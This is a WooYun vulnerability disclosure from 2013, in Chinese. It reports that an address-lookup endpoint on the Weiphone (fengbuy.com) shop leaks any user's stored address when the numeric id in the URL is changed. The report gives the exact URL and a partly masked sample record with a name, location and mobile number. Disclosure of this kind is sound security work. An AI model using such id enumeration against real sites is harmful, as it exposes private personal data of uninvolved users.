漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-020067
漏洞标题:威锋商城权限限制不严,导致可以直接爆出所有用户资料
相关厂商:威锋网
漏洞作者: 孤独雪狼
提交时间:2013-03-14 18:50
修复时间:2013-04-28 18:51
公开时间:2013-04-28 18:51
漏洞类型:用户资料大量泄漏
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-03-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-04-28: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
- -我很怀疑这个漏洞会有人认领吗?
详细说明:
http://www.fengbuy.com/account/accountInfo/gerAddressByIdAjax/?id=5
修改Id=后面的数字
至于后面能修改到多少我就不清楚了 你们看着办
当然 我不会告诉你这是程序问题
漏洞证明:
部分内容编码了,解开看看:
{"success":"1","info":{"entity_id":"5","entity_type_id":"2","attribute_set_id":"0","increment_id":"","parent_id":"43","created_at":"2012-01-16 12:08:29","updated_at":"2013-02-28 11:34:16","is_active":"1","prefix":"","firstname":"熊**","suffix":"","city":"长沙市","country_id":"CN","region":"湖南省","postcode":"410624","telephone":"","district":"宁乡县","mobile":"1501941****","region_id":"18","city_id":"177","district_id":"1563","street":"月华村","default_billing":"0","id":"5"}}
修复方案:
看漏洞证明,怎么修复你们是专家
版权声明:转载请注明来源 孤独雪狼@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝